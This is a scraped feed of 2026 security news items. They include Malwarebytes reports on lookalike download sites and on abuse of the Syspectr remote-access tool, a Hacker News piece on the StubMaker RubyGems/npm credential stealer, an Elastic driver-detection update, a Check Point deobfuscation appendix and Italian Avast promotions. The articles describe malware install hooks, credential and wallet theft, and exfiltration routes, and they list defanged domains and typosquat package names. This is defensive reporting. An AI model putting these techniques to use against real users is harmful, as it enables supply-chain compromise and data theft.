f575ede398253d0b3aec3e252c429e150c42976d6badeea31e48a0356ecbd27796df83fc6d3de16eae27ae65977287bdfb7b0e15fd3603f857650ec266b414d097101da12c438465957f32b3942d5543177f07e49fc84f1409a49b5df7d25549e543607c223b87695e711a90b5ece5380e1acaed56827e8d51b7f4288b12373c8d6488fde69c8ce0dfa02e707af9a353f0e2d7a77489c11c2249a1d9dbccf74070130b31834e8d7c30d1fce0cb2b9dec26a10f0822aeffb19e81b35b76b4d97751c0724bc0c7f3b8336d34b6405a33fcb95e1323e2ca8c688af02b315fc1bded19fa27bd1c7ca6f1ce8b5448b4f7b013e8c6191b20d3f8291fa0180946b9a6ad373b7a8f983e2e59722833568125bcc55000503cfe6b470925b7d095ff7592bef79fe52e0573123ccfd4494c555adda2eb54b88f5c9c0880110c576a57fc040eddd84d631786b8dda06dce0f294c62f2a2393c812ff711bde831bf420a4df484bcf5b6241fc0f00d0 Appendix – C Of the 24 payloads listed in  Appendix B , 23 use the dominant string-obfuscation variant handled by  deobf_str2.py . The older payload  91038aebe528a065c3e995a418db6826  uses the simpler variant handled by  deobf_str1.py . All identified obfuscated string chunks in these 24 payloads were successfully deobfuscated  — meaning that each identified obfuscated chunk was decrypted into a valid string chunk. Complete listings are available in the repository [ 8 ] in the files named by the pattern:  {md5}.deobf.txt.strings.txt . Related Research [1]  Sealed Chain of Deception: Actors leveraging Node.JS to Launch JSCeal [2]  Exploring Compiled V8 JavaScript Usage in Malware [3] View8 (original): https://github.com/suleram/View8 [4] View8 fork:  https://github.com/j4k0xb/View8/ [5] Brotli Algorithm:  https://github.com/google/brotli [6] JavaScript Obfuscator: https://github.com/javascript-obfuscator/javascript-obfuscator [7] JSC_deobfuscator: https://github.com/hasherezade/jsc_deobfuscator/ [8] Material extracted from the analyzed samples: https://github.com/hasherezade/jsceal_datasets [9] V8 string literal patch: https://github.com/hasherezade/jsc_deobfuscator/blob/main/Utils/disasm/patches/v8_string_patch.diff [10] V8 build instructions:  https://github.com/hasherezade/jsc_deobfuscator/wiki/Building-V8-Disasm [11]  Demos illustrating the deobfuscation process live [12]  Microsoft Security: threat actors misuse Node.js to deliver malware and other malicious payloads [13]  Cato CTRL Threat Research: A Deep Dive into a New JSCEAL Infostealer Campaign The post Breaking the Seal: Static Deobfuscation of JSCeal’s Compiled V8 Bytecode appeared first on Check Point Research .
research.checkpoint.comAug 31, 2026extracted
Dai deepfake ai ransomware: come blindare 10 dispositivi con rilevamento truffe e difesa da remoto
L’offerta sull’antivirus multidispositivo di Avast è disponibile per un periodo promozionale con uno sconto fino al 60% rispetto al prezzo di rinnovo annuale. La promozione di Avast riguarda le principali soluzioni, inclusa Premium Security, ed estende la protezione fino a 10 dispositivi tra Windows, macOS, Android e iPhone/iPad. Avast include anche nuove funzioni dedicate al contrasto delle truffe online, del phishing e dei contenuti deepfake generati con l’intelligenza artificiale, oltre a una garanzia di rimborso entro 30 giorni. Indice degli argomenti La promozione di Avast riduce il costo del primo anno di abbonamento e permette di risparmiare fino a 63 euro rispetto al rinnovo previsto dal listino. La tabella riepiloga i prezzi disponibili per le due principali configurazioni di Premium Security. L’abbonamento copre l’intero primo anno. Al termine della promozione si applica il prezzo di rinnovo indicato da Avast. Premium Security di Avast concentra in un’unica suite gli strumenti di protezione contro le principali minacce informatiche. La suite integra diversi livelli di sicurezza che agiscono durante la navigazione e nell’utilizzo quotidiano del dispositivo. Tra le funzioni incluse figurano: blocco di virus e malware; protezione contro gli attacchi ransomware; difesa dai siti web di phishing; rilevamento di siti contraffatti e pagine non sicure; blocco degli attacchi con accesso remoto al PC. L’obiettivo è ridurre il rischio di furto di dati, credenziali e file personali. Una delle novità dell’offerta riguarda l’Assistente Avast dedicato alle frodi online. Lo strumento analizza contenuti sospetti e aiuta a individuare: messaggi SMS fraudolenti; chiamate telefoniche sospette; truffe online; video deepfake e contenuti falsificati tramite IA. Questa funzione aggiunge un livello di controllo contro le tecniche di social engineering sempre più diffuse. L’antivirus multidispositivo permette di utilizzare un unico abbonamento su sistemi operativi differenti. Sono supportati: PC Windows; Mac; smartphone Android; iPhone e iPad. La versione da 10 dispositivi consente di proteggere contemporaneamente computer, tablet e smartphone appartenenti allo stesso nucleo familiare o allo stesso utente. Oltre all’antivirus, Avast propone altri servizi scontati del 60% durante il primo anno. SecureLine VPN: la VPN cifra il traffico Internet e protegge la connessione quando si utilizzano reti Wi-Fi pubbliche o condivise. AntiTrack riduce il tracciamento della navigazione mascherando l’identità digitale. BreachGuard controlla se informazioni personali risultano coinvolte in violazioni di dati. La promozione comprende anche strumenti dedicati all’ottimizzazione dei PC Windows. Cleanup Premium elimina file inutili, libera spazio di archiviazione e contribuisce a velocizzare il sistema. Driver Updater esegue la scansione automatica dei driver installati, installa gli aggiornamenti disponibili e corregge eventuali incompatibilità. Il vantaggio economico principale riguarda Premium Security nella versione per 10 dispositivi. Con il prezzo promozionale di 39,99 euro il costo mensile scende a 3,33 euro, contro un rinnovo annuale di 99,99 euro. Il risparmio complessivo raggiunge 60 euro nel primo anno. Anche gli altri servizi della piattaforma applicano la stessa riduzione del 60% sul primo anno di abbonamento, con prezzi che partono da 16,80 euro per BreachGuard e arrivano a 37,60 euro per SecureLine VPN nella versione per 10 dispositivi.
cybersecurity360.itAug 26, 2026extracted
41 deceptive download sites show a real link, then send you somewhere else
We identified a network of 41 websites impersonating popular games and Windows software, all designed to push visitors towards the same Download Studio installer. The sites advertise everything from Counter-Strike, Half-Life, Fallout, Roblox, PUBG, and The Witcher to VLC, 7-Zip, Paint.NET, VMware, Total Commander, and Foxit PDF. They go to surprising lengths to look convincing, using accurate product information, genuine developer resources, and even real download links. But the link you see isn’t the link you follow. One site promises Counter-Strike. Hover over its download button and the browser displays a genuine Steam Store address. Click the button, however, and Steam never opens. The link looks safe when you hover, but the click says otherwise. One of the oldest web-safety tips is to hover over a link before clicking it and inspect the destination shown by your browser. We even recommend doing this when checking emails for phishing links and scams. But it isn’t foolproof. This campaign shows how a site can display a legitimate destination when you hover over a link, then send you somewhere completely different when you click it. On the Counter-Strike page, the download button contains a legitimate Steam Store URL. That is the address the browser displays when you hover over it. But JavaScript on the page handles the click separately. Instead of following the Steam link, the script cancels the expected navigation and sends the visitor through an affiliate redirect. The legitimate Steam URL provides reassurance, but isn’t the actual destination. The page goes further by linking to genuine Steam resources in its footer and presenting itself as a straightforward source of technical information. That veneer disappears the moment the download button is pressed. 41 sites, one destination The Counter-Strike site isn’t an isolated example. Across the 41 sites we identified, the branding and advertised downloads change, but visitors are ultimately pushed towards the same software: Download Studio. One site, GTA 6 PLAY, claims to offer a PC download of Grand Theft Auto VI. It provides installation instructions, system requirements, and everything else you might expect from a real game-download page. There is one rather significant problem: There is no announced PC version to download. Rockstar currently lists Grand Theft Auto VI for PlayStation 5 and Xbox Series X|S, with a release date of November 19, 2026. It has not announced a PC release. After visitors follow the download process, they’re shown instructions telling them to install Download Studio. Here’s an example of that screen from the Counter-Strike site: In other words, the advertised software is the lure. Installing Download Studio is the destination. The software lures are even more convincing The same technique appears on pages advertising ordinary Windows applications. A fake VLC Media Player page, for example, places a genuine VideoLAN download address inside its download button. It also identifies VideoLAN’s servers as the source of the file. At the time of our research, VLC 3.0.23 was VideoLAN’s current release. So the information shown to the visitor can be completely accurate. The link can be real. The version can be real. The developer can be correctly identified. Then the click handler overrides all of it. Instead of allowing the browser to retrieve VLC from VideoLAN, the page sends the visitor toward Download Studio. Even the signature advice can mislead you The VLC lure also recommends checking the installer’s digital signature before running it. A digital signature allows Windows to verify who signed a piece of software and whether the signed file has been changed since it was signed. To check one, right-click the downloaded file, select Properties, then open the Digital Signatures tab. You can select the signature and click Details to see whether Windows considers it valid and who signed it. Normally, that’s a useful check. But the Download Studio installer passes it. The sample we examined is validly signed by Grand Media, TOV. So you could follow the page’s advice, see that Windows considers the signature valid, and still have downloaded something completely different from what you intended. That’s because a valid signature tells you who signed a file and whether the signed content has been altered. It doesn’t tell you that you’ve downloaded the program you intended to. Microsoft’s own Authenticode documentation makes the same distinction. Code signing provides information about the publisher and integrity of a file. It does not guarantee that signed software is trustworthy. The lures include everyday software This campaign isn’t limited to people looking for unreleased games. VLC, 7-Zip, Paint.NET, and AIMP are legitimate applications people routinely download. Someone searching for one of them is doing nothing unusual. Other lures target security, backup, and recovery products, including Avast, Acronis, and Recuva. Someone looking for everyday software, or even software to protect or recover their computer, can be pushed into installing a program they never asked for. What the sites actually deliver The sample delivered during our research is a roughly 73 MB Windows installer for Download Studio. It is signed by Grand Media, TOV, and the signature validates successfully. Our analysis found Download Studio installing and launching its own interface and torrent components. The program registers torrent and magnet associations, and its installer includes an option to make Download Studio the default torrent client. The installation also enables its automatic updater. Importantly, our analysis did not establish that Download Studio itself is malware. What this campaign clearly demonstrates is that people looking for one piece of software are being deceptively funneled into installing another. The redirect includes affiliate tracking, suggesting there may be a commercial incentive. Download Studio has relevant history There is another reason Download Studio’s automatic updater caught our attention. In 2020, researchers at Avast found that Download Studio’s automatic updates had been used to silently distribute FakeMBAM, a backdoor disguised as a Malwarebytes installer. Avast monitored Download Studio’s updates and observed the fake Malwarebytes installers being delivered and executed in the same way as legitimate updates, silently in the background and without users knowingly initiating the installation. The backdoor could download additional malware, and the persistent payloads Avast observed were cryptocurrency miners. When the researchers contacted Download Studio’s developers, they said they had detected a security incident involving their continuous-integration server, investigated it, and added additional security measures. Avast said the developers did not answer follow-up questions about how many users were affected or whether they had been notified. The research also named Grand Media, TOV among the companies associated with the applications involved. The Download Studio installer we examined in this campaign is also signed by Grand Media, TOV. There is no evidence that the Download Studio installer in this campaign is malicious or that the same attack is happening again. But its automatic-update mechanism has previously been abused to distribute malware, making the fact that the current installer enables automatic updates relevant. Check what you actually downloaded There is another simple check that exposes the bait-and-switch used by these sites. Right-click the downloaded executable, select  Properties , and open the Details tab. For the sample we examined,  File description  and  Product name  identify Download Studio,  Original filename  is  DS-Setup.exe , and the copyright information names Grand Media. If you clicked a button labelled “Download VLC” and those fields say “Download Studio,” you have an immediate and obvious mismatch. The Details tab isn’t proof that a file is safe, however. The software publisher controls that information, so a malicious program could use convincing product names and descriptions. Instead, look at the whole download: Did it come from the developer or a trusted store? Is it signed by the publisher you expected? And does the file identify itself as the program you meant to download? How to protect yourself There are a few simple ways to avoid getting caught by this kind of download bait-and-switch: Get software directly from the developer’s website or a trusted app store. For games, use a legitimate store such as Steam or the publisher’s own store. Don’t rely on hovering over a link alone. As this campaign shows, a page can display a legitimate destination and then send you somewhere else when you click. A valid digital signature doesn’t mean you got the right program. Check  Properties > Details  and confirm the product name matches what you wanted. If a download page says you need to install a separate download manager first, close it. If a game hasn’t been released for your platform, a site claiming to offer an official download cannot have it. If Download Studio is already installed and you didn’t choose it, remove it through  Settings > Apps  and run a  full virus scan . Malwarebytes Browser Guard  blocks pages like these before they load, which stops the problem before you’ve downloaded anything. Indicators of Compromise (IOCs) File hashes (SHA-256)   9a3f6e69c12cb814c45862219ecb17e9ab7744877c9da1c49f3ea046437f8fca  ( DS-Setup.exe ) Network indicators   r.byteengineering[.]net   apis.downloadstud[.]io downloadstudio[.]net dstudio[.]app   getdownloadstudio[.]net   4kvideodownloader[.]ru acronisportal[.]ru cristalixmine[.]ru , crystaldisk24[.]ru csgodownload[.]ru cupheadplay[.]ru fallout24[.]ru farcryplay[.]ru faststoneportal[.]ru formatf[.]ru foxitpdf[.]ru get7zip[.]ru getaf[.]ru getaimp[.]ru getavast[.]ru getbandicam[.]ru getbluestacks[.]ru getmovavi[.]ru getrecuva[.]ru getultraiso[.]ru getvmware[.]ru getvuescan[.]ru gogetter24[.]ru gta6-play[.]ru halflife-play[.]ru memuemulator[.]ru paintdotnet[.]ru pdfxchange[.]ru poppyplaytimeplay[.]ru pubgplay[.]ru rdrplay[.]ru regorganize[.]ru roblox-play[.]ru rust-play[.]ru   tcommander[.]ru tf2play[.]ru   thewitcherplay[.]ru uninstalltooll[.]ru   vlcmp[.]ru   windowsmp[.]ru yandereplay[.]ru Stop threats before they can do any harm. Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →
malwarebytes.comAug 19, 2026extracted
16 Typosquatted RubyGems Packages Steal Browser Credentials and Crypto Wallets
Cybersecurity researchers have flagged a new typosquatting campaign targeting RubyGems users with a Windows-based information stealer. OpenSourceMalware, which discovered the activity on August 15, 2026, is tracking the threat under the moniker StubMaker. The complete list of packages published as part of the campaign is below - ubnuler ubnlder ri18nr reaker rakier orakw joxn ise18n ioe18n ie18u iai8n i1l8n i18om activesupmport brumdler brundlef "This new malware harvests browser credentials, cryptocurrency wallets, seed phrases, and Telegram data," security researcher Paul McCarty (aka 6mile) said. "All of the malicious RubyGems packages appear to be typosquats of popular Ruby dependencies, but rather than the clever SEO-fueled typosquats we've seen from other threat actors (e.g., events-channel imitating the popular Node.js events module), they're all clumsy typos." The 16 gems have been published by users named "mod8rz41mje" (aka Riley Miller) and "rbq95bwt6q" (aka Alex Davis). As of writing, the packages have been yanked from RubyGems. In at least two cases – brumdler and brundlef – the threat actor has been found to take advantage of a known RubyGems behavior that makes a namespace available for anyone to claim once all versions of a gem have been yanked. In both instances, the packages were originally published by "gemlewqqhu1" (aka Taylor Moore) before they were reclaimed by the aforementioned two accounts. Jenn Gile, co-founder of OpenSourceMalware, told The Hacker News that although the campaign was disrupted fairly early, it became more effective because of Ruby's "poor design choices" via package name reuse and an unvalidated author field. "When one of the malicious gems was yanked, the threat actor was able to spin up a new owner account and publish a new malicious version under the same package name," Gile said. "What should have been forever dead was revived to compromise more people." "The attacker assigned a different 'Author' name for each gem in an attempt to make them look unrelated, even though they all came from the same owner account. This is because the Author field is a totally unvalidated plaintext field. It doesn't have to match the Owner or anything else." The attack chain, at a high level, makes use of an "extconf.rb" hook to trigger the execution hook. Similar to npm's lifecycle hooks, "extconf.rb" is run automatically when a user installs a gem. The file is typically used to configure native extensions written in C, C++, or Rust that are bundled inside a Ruby package within the "ext/" directory and compiled during installation of the gem. In the case of StubMaker, the Ruby hook acts as a conduit to fetch a 22 MB Rust-based loader from a GitHub release, which, in turn, launches a Go-based stealer ("wincfg") payload embedded into it. The GitHub account ("github[.]com/bebraz1") is no longer accessible. The stealer, for its part, incorporates a DLL payload ("abe_payload.dll") that's used to extract credentials from Chromium-based web browsers (i.e., Google Chrome, Microsoft Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, Avast, AVG, and CCleaner Browser) by circumventing app-bound encryption (ABE) protections added by Google. It also collects extension data, browsing history, and payment card numbers; searches for cryptocurrency wallets and seed phrases; extracts Telegram Desktop data; gathers system information; and makes an external request to "api.ipify[.]org" to obtain the victim's public IP address. Once the relevant data is captured, it's uploaded to Gofile in the form of a password-protected ZIP archive and the resulting download link is sent to the threat actor ("dresslee.com") over an unencrypted HTTP channel. "StubMaker doesn't build anything — it generates a Makefile with empty all, install, and clean targets, plus Unix and Windows stub scripts that do nothing but return success, so the extension phase reports a clean build while the real work (the platform beacon, the Windows loader fetch and execution) happens in the installer hook itself," McCarty explained. "The name points at that specific move: manufacturing a fake build toolchain to make a malicious install look like a routine one, rather than just describing another typosquatted RubyGems package." The disclosure coincides with the discovery of two software supply chain campaigns targeting npm - A cluster of 21 npm packages that typosquatted CLI binary names exposed by Google's scoped packages to deliver a minimal postinstall beacon. "The packages did not squat package names," SafeDep said. "They targeted the bin field, the part of package.json that defines executable command names. Every scoped package that declares a bin entry creates an unscoped name that anyone can register. None of the standard dependency confusion mitigations (scoped publishing, registry allowlists, lockfile pinning) cover this gap." A cluster of Baileys npm forks that engage in a variety of malicious behaviors: covertly make the installer's WhatsApp account follow channels the package author controls and inject the author's advertising URL into every image and video the bot sends. "Continuous monitoring of the npm registry records 4,250 package names that contain baileys and another 112 that contain libsignal-node," SafeDep said, adding the malicious behavior has been observed in 70 package names built on Baileys across 343 versions and 15 libsignal-node impersonators across 38 versions. Update The StubMaker campaign has also been observed targeting npm with a set of 37 packages that make use of a postinstall hook to retrieve the same GitHub-hosted Windows loader, which then unpacks a Go infostealer targeting browser credentials and sessions, payment-card data, cryptocurrency wallets and seed phrases, Telegram data, and host information. "This was one threat actor running two typosquatting fronts against two package ecosystems, sharing a single payload and a single C2 backend," Gile said. As with the malicious RubyGems, the npm packages are typosquats of popular packages such as axios, chalk, commander, lodash, typescript, and react. None of the packages are available for download as of writing. The names of the typosquats are below - axois-http, axious-core chalk-core, chalk-lib, chalk-util, chalk-es comand, comander-cli, comanderjs, commandorjs, commandor-cli, commandor-core, comander-lib, commandor-lib, commander-lib loadashjs, lodash-lib, ladash-cli, lodahsjs, lodsh-cli, lodahs-cli, lodhash-cli typescirpt-cli, typscript-cli, typesript-cli, typscript-core, typescriptt-cli, typescrip-cli, typescipt-cli, tyepescript-cli, typescirpt-core, tyepescript-core, typesript-core, typescipt-core, typescriptt-core raectjs testingsmthb1g OpenHack, which also published details of the activity, said the packages were published on August 16, 2026. If any one of the packages was installed on a Windows machine during the time it was live, it's recommended to isolate the host, rotate credentials, and remove the malicious libraries. OpenSourceMalware has also flagged some key differences between the two campaigns - The gems use "extconf.rb," whereas the npm packages employ a postinstall hook to trigger the execution of the loader The Ruby installer decodes its loader URL from Base64, whereas the npm installer uses repeated-key XOR with a hard-coded key The gems were published during a two-day period, whereas the npm packages were uploaded to npm in an eight-minute window across five accounts "RubyGems' pattern was sequential and single-point-of-failure," Gile added. "One account gets caught, the operator adapts and returns. npm's pattern spread the same burst across multiple burner accounts simultaneously, so losing any one account wouldn’t have taken down the whole batch. However, in spite of the different approach, the npm packages were rapidly discovered and removed as a cohort." In a follow-up report published on August 20, 2026, CloudSEK said it identified three more npm packages mimicking the legitimate typescript library: typecript-cli*, typecript-core, and typescrit-cli. It's tracking the activity under the name BRIDGEHEAD. The packages also implement a Windows Subsystem for Linux (WSL) gate so that a developer running npm install inside the Linux environment is treated as a "bridge" to reach the underlying Windows machine and deploy the stealer malware. "The npm layer is loud, cheap and disposable: forty impersonation packages published to a public registry and withdrawn in since removed," security researcher Vikas Kundu said. "The payload layer is quiet and durable: one Rust executable on GitHub and one exfiltration route through a public file host, neither of which the npm takedown affected." "The WSL bridge narrows the target from developers in general to developers running that toolchain on Windows. That is a large and deliberately chosen group. A pure-Linux or macOS developer installing the same package is profiled and beaconed but receives no Windows payload; the gate simply does not open." (The story was updated after publication on August 19 and 21, 2026, to include the campaign's targeting of npm.)
thehackernews.comAug 18, 2026extracted
Fake popular sites offer a free app, instead take over PCs
A website built to look almost exactly like CNN’s homepage is telling visitors to download “the new CNN app.” But it’s not CNN’s app, and has nothing to do with the news company. The campaign doesn’t stop at CNN. It also uses fake Stremio and Avast installers hosted on similarly convincing lookalike sites, all targeting Windows users. The installers are part of the same campaign to trick people into installing legitimate remote-management software that’s already linked to the attacker’s account. Instead of downloading the software they expected, victims install O&O Syspectr, a genuine, digitally signed remote administration tool used by IT teams to manage computers. In the wrong hands, that tool can give an attacker remote access to a victim’s PC, allowing them to run commands, install additional software, or explore files and data. The CNN, Avast, and Stremio lures all point back to the same Syspectr account. Another lookalike site uses a fake crypto-mining browser game instead of a trusted brand, but delivers the same software from a different Syspectr account. Here’s what we found, why your antivirus has no reason to stop it, and the one 10-second check that would have caught it every time. What the fake CNN page looks like The site copies CNN’s real homepage closely enough that most people wouldn’t look twice. It has current headlines, the same layout, and even a red “Live Updates” tag on a real story. A pop-up interrupts almost immediately: “Get the latest news first in the new CNN app—it’s live and free,” with a red Download button underneath. The file behind that button is named CNN_App.setupad4693fd-d903-4791-8f58-975261c93ca2.exe—the same Syspectr installer that shows up under different branding elsewhere, down to the account ID embedded in the filename. The same trick, impersonating other brands A lookalike site at avast-premium[.]shop mimics Avast’s real download page closely, including the logo, review scores, and a blue “Free download” button for “Avast One.” The file behind it is named AVAST_App.setup4693fd-d903-4791-8f58-975261c93ca2.exe. Another malicious site, stremiotv[.]online, copies Stremio, a legitimate media-center app. The file it pushes visitors to download is named Stremio_App.setup4693fd-d903-4791-8f58-975261c93ca2.exe. Both carry the same account ID found in the CNN installer. By impersonating trusted brands, the attackers trick visitors into installing the legitimate O&O Syspectr remote-access tool, which gives the attackers remote access to the victims’ computers. A different kind of bait Not every lure needs a trusted brand, however. syncminer[.]xyz invents its own hook instead: an “idle miner” browser game showing a slowly-ticking cryptocurrency balance, with a “Download Miner Plugin” button promising faster payouts. The identical site also runs at idleminer[.]pro with the same layout, same game, and same download. Both distribute the same file, named oo-syspectr-setup9158bf2a-ff25-4290-b96c-2dc5eb310391.exe outright, carrying its own account ID that is different from the CNN, Avast, and Stremio lures we saw. It’s not malware, which is why antivirus can miss it Every one of these files is a real, digitally signed piece of software from O&O Software GmbH, a legitimate German company. Syspectr is sold openly to IT departments and gives an operator remote desktop control and an admin-level command line on whatever machine it’s installed on. That’s why antivirus software may not stop it. Antivirus is designed to detect malicious software, not flag a legitimately signed business tool just because of how it arrived on a computer. The attacker only has to convince victims to install a legitimate remote-management tool that’s already linked to the attacker’s account. The 10-second check that gives it away On Windows, right-click any installer like this, choose Properties, and open the Details tab. Two fields—File description and Product name—identify every installer we examined as O&O Syspectr, alongside a copyright notice for O&O Software GmbH. The filename can be changed by anyone distributing the file, but those embedded details come from the signed software itself. Changing them would invalidate the digital signature, so they reveal what the installer really is. How we know these are connected Every Syspectr installer includes the account ID of whoever generated it, embedded directly in the filename. The CNN-, Avast-, and Stremio-branded files all carry the exact same account ID, showing they were created from a single Syspectr account and simply reskinned for different lures. The Syspectr installer distributed through the fake crypto-mining game carries a different account ID, suggesting either a second operator using the same playbook or the same group operating under another account. What this tool can actually do Syspectr is designed to let IT administrators manage computers remotely. Depending on the subscription level, that can include viewing system information, monitoring running processes and services, managing Microsoft Defender, and restricting USB devices. The paid plans add the features that matter most to attackers. They allow an operator to remotely control the victim’s computer, browse files, run commands, install additional software, and make changes to the system as though they were sitting in front of it. Higher tiers add tools for managing large numbers of devices and, on compatible hardware, even allow remote access when Windows won’t boot. These remote-control features aren’t available on free Syspectr accounts. They require a Premium subscription or higher. O&O Software response O&O responded quickly. Within days, the company disabled Remote Desktop and Remote Console access for free Syspectr accounts, restricting both to paid plans only. O&O has since identified and suspended the abusive accounts, also blocking them from adding new devices. O&O’s analysis found the attackers relied exclusively on Remote Console, not Remote Desktop. The company says it will keep scanning for this pattern and tighten restrictions further if needed. It’s a solid response and O&O clearly has a handle on how the abuse is happening. Not every vendor moves this quickly or this effectively when their software gets abused. How to protect yourself Only download software from the vendor’s actual website. Search results and ads can lead to convincing fakes. Before running any installer you’re unsure about, on Windows you can right-click it, open Properties > Details, and check the File description and Product name fields. If you find O&O Syspectr installed and didn’t set it up yourself, uninstall it through Settings > Apps and run a full antivirus scan. If you ran an installer like this recently, change passwords for anything you accessed on that machine afterward from a clean machine. Protect yourself while browsing online. Malwarebytes Browser Guard blocks known scam and lookalike pages before you land on them. Remember Fake download sites don’t always deliver malware. Sometimes they deliver legitimate software that’s been weaponized by the person distributing it. That’s why it’s important to download software from the real vendor and, if something doesn’t feel right, check what the installer actually is before you run it. Indicators of Compromise (IOCs) Account ID 4693fd-d903-4791-8f58-975261c93ca2: app.cnn-news[.]net →CNN_App.setupad4693fd-d903-4791-8f58-975261c93ca2.exe avast-premium[.]shop →AVAST_App.setup4693fd-d903-4791-8f58-975261c93ca2.exe stremiotv[.]online →Stremio_App.setup4693fd-d903-4791-8f58-975261c93ca2.exe Account ID 9158bf2a-ff25-4290-b96c-2dc5eb310391: syncminer[.]xyz →oo-syspectr-setup9158bf2a-ff25-4290-b96c-2dc5eb310391.exe idleminer[.]pro →oo-syspectr-setup9158bf2a-ff25-4290-b96c-2dc5eb310391.exe Stop threats before they can do any harm. Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →
malwarebytes.comAug 11, 2026extracted
Sicurezza delle reti e Wi-Fi pubblici: la cifratura del traffico è diventata la prima linea di difesa per la privacy
Fino al 60% di risparmio sui prodotti Avast: ecco il punto centrale della promozione disponibile sul servizio VPN e sugli strumenti di sicurezza collegati. Avast propone formule per PC, Mac, Android e iPhone/iPad, con SecureLine VPN dedicata alla cifratura della connessione. Le opzioni dell’offerta di Avast includono anche strumenti per privacy, prestazioni e protezione dalle minacce online. La promozione prevede inoltre una garanzia di rimborso entro 30 giorni. Indice degli argomenti SecureLine VPN è il servizio di Avast cifra la connessione e crea un canale protetto per le comunicazioni online. La tecnologia permette di aumentare la sicurezza anche quando il dispositivo utilizza reti Wi-Fi pubbliche o non protette. Il servizio contribuisce inoltre a proteggere le attività online da hacker, provider Internet e aziende. Le attività di navigazione e le app utilizzate non vengono registrate, secondo le informazioni fornite nell’offerta. La VPN permette di scegliere tra diversi server internazionali e di collegarsi automaticamente alla posizione più veloce con un clic. Sono disponibili server in numerosi Paesi, tra cui Stati Uniti, Regno Unito, Italia, Germania, Francia e Giappone. SecureLine VPN supporta fino a 10 dispositivi e indica velocità fino a 2 Gbit/s. Il servizio può essere utilizzato anche per gaming, download di file di grandi dimensioni e streaming. La protezione comprende anche dispositivi Android TV. La VPN consente di aumentare la riservatezza della connessione durante l’utilizzo di smart TV compatibili. Le formule dell’offerta di Avast presentano prezzi promozionali differenti in base al numero di dispositivi e al prodotto scelto. Per Premium Security si parte da 29,20 euro nel primo anno, mentre Ultimate arriva a 55,99 euro per la formula da 10 dispositivi. Il risparmio maggiore è quindi di 84 euro, ottenuto sulla formula Ultimate da 10 dispositivi: il prezzo promozionale passa da 139,99 a 55,99 euro per il primo anno. Per chi cerca esclusivamente la VPN, SecureLine propone una formula da 10 dispositivi a 51,48 euro per il primo anno, contro un prezzo di rinnovo indicato in 93,99 euro. L’offerta prevede inoltre formule biennali a 102 euro e triennali a 153 euro. Il servizio include una prova gratuita di 60 giorni e una garanzia di rimborso di 30 giorni.
cybersecurity360.itAug 11, 2026extracted
Elastic Defend now covers 800+ vulnerable drivers, with automated troubleshooting and ARM support
Elastic Defend now covers 800+ vulnerable drivers, with automated troubleshooting and ARM support Attackers reaching for kernel access on a Windows machine bring a driver Microsoft already trusts. It is signed, it loads, and it carries a known flaw. That flaw gives them enough room to tamper with memory or disable the security software watching the host. Once an attacker holds that level of access, the tools on the machine stop reliably protecting it. Ransomware crews run the technique as a step before they deploy a payload, a move that began as tradecraft mostly reserved for advanced state actors and red teams. Where the rules come from “To close this gap, Elastic Security Labs Threat Command, Elastic’s security research team now continuously monitors public vulnerable driver disclosure sources, including VirusTotal, the LOLDrivers catalog, and Microsoft’s Vulnerable Driver Block List, and automatically generates and instantly deploys detection rules,” Elastic Security Labs explained. No single source catches everything. The system checks all three, filters out drivers Elastic already covers, and builds rules from the driver’s digital signature and file characteristics. Automated YARA rule generation workflow (Source: Elastic Security Labs) Elastic Security Labs has published vulnerable driver coverage for years. This automated process started in 2023 with 65 rules. The library covers more than 800 known vulnerable drivers, and the number keeps growing. The delay is the technique A vulnerable driver becomes public knowledge and attackers know about it the same day. Vendor coverage can take an entire product release to arrive. That window is what BYOVD depends on. Elastic decoupled this coverage from its release cycle. A driver flagged in one of the three feeds becomes a driver Elastic Defend recognizes, with no update or setting change on the customer side. One driver, two campaigns Avast’s signed anti-rootkit driver, aswArPot.sys, gave attackers a way to terminate protected processes from the kernel. It surfaced in Cuba ransomware intrusions and in GHOSTENGINE campaigns. What a defender has to check The rules ship through Elastic Security’s malware protection. Elastic recommends enabling it and setting it to Prevent. Signature coverage is one layer. Elastic Defend validates drivers against a blocklist before they are allowed to load, and it flags a driver the moment it appears in an environment for the first time. A driver built to slip past one of those layers still has to clear the others. Every generated rule is public. The elastic/protections-artifacts repository carries them alongside the rest of the company’s detection content, so a team can see which driver triggered a rule, which source flagged it, and the detection logic itself. Two other changes Elastic Agent Builder carries automatic troubleshooting as a skill. It covers third-party antivirus conflicts, policy application failures, and the errors that send analysts into logs for hours, and it returns a root cause, the commands to run, and the data to collect. The existing automatic troubleshooting feature stays in place. Elastic Defend also runs on Windows on ARM. Snapdragon laptops, Copilot+ PCs, and ARM workstations enroll under existing policies and report the same telemetry as x64 endpoints, and devices added to a fleet enroll automatically. Signature rules cover the drivers someone has already reported. The layer that flags a driver on its first appearance covers the ones nobody has reported yet.
helpnetsecurity.comAug 3, 2026extracted
Sconto Avast: fino al 60% sull’antivirus e sui servizi di sicurezza digitale
Lo sconto Avast consente di acquistare per un periodo limitato diversi prodotti con una riduzione fino al 60% rispetto al prezzo di rinnovo. L’offerta riguarda antivirus, strumenti per la privacy, VPN e software per l’ottimizzazione dei dispositivi, disponibili per PC, Mac, Android e iPhone/iPad. Avast propone sia soluzioni dedicate alla protezione essenziale sia pacchetti completi per chi desidera un ecosistema integrato di sicurezza. La promozione interessa numerosi prodotti Avast ed è valida sui piani annuali indicati. Indice degli argomenti Le offerte principali di Avast comprendono Premium Security e Ultimate, disponibili nelle versioni per 1+1 dispositivo oppure fino a 10 dispositivi. Le funzionalità disponibili includono: blocco di virus e malware; protezione dal ransomware; rilevamento delle truffe online tramite Assistente Avast; blocco di SMS e chiamate fraudolente; riconoscimento di deepfake e video falsificati; protezione dai siti di phishing e dai siti web contraffatti; verifica della sicurezza delle reti Wi-Fi; difesa dagli attacchi con accesso remoto al PC. Chi sceglie Ultimate ottiene anche strumenti aggiuntivi dedicati alla privacy e alle prestazioni del sistema. Le soluzioni più complete integrano SecureLine VPN, Cleanup Premium e AntiTrack. SecureLine VPN cripta la connessione Internet per ridurre i rischi durante la navigazione su reti pubbliche. AntiTrack limita il tracciamento delle attività online. Cleanup Premium elimina file inutili e contribuisce a migliorare le prestazioni del computer. Per chi preferisce acquistare singoli strumenti, la promozione comprende anche Secure Browser PRO, BreachGuard e Driver Updater. I prezzi promozionali di Avast sono calcolati sul primo anno di abbonamento 